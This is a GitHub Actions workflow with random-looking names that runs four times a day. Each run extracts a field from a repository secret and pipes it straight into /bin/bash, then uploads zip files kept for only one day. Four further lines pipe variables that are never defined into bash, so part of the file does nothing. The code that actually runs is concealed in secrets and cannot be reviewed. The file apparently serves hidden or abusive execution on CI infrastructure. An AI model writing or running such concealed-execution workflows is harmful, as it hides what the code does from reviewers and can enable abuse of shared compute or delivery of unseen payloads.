name: rebeccadartcode
on:
  workflow_dispatch:

  schedule:
    - cron: '21 0,6,12,18 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: rebeccadartcode
        env:
          u20: ${{ secrets.u20 }}
        run: |
          printf '%s' "$u20" | jq -r .bups2 | /bin/bash
          printf '%s' "$s87" | jq -r .omjc05 | /bin/bash
          printf '%s' "$jyob3" | jq -r .zofi060 | /bin/bash
          echo $hpggr54684 | jq -r .azfg2 | /bin/bash
          echo $omfkg3 | jq -r .jigkw0 | /bin/bash

      - name: Upload artifact
        uses: actions/upload-artifact@v4
        with:
          name: WyOwB6y1
          path: "*.zip"
          retention-days: 1
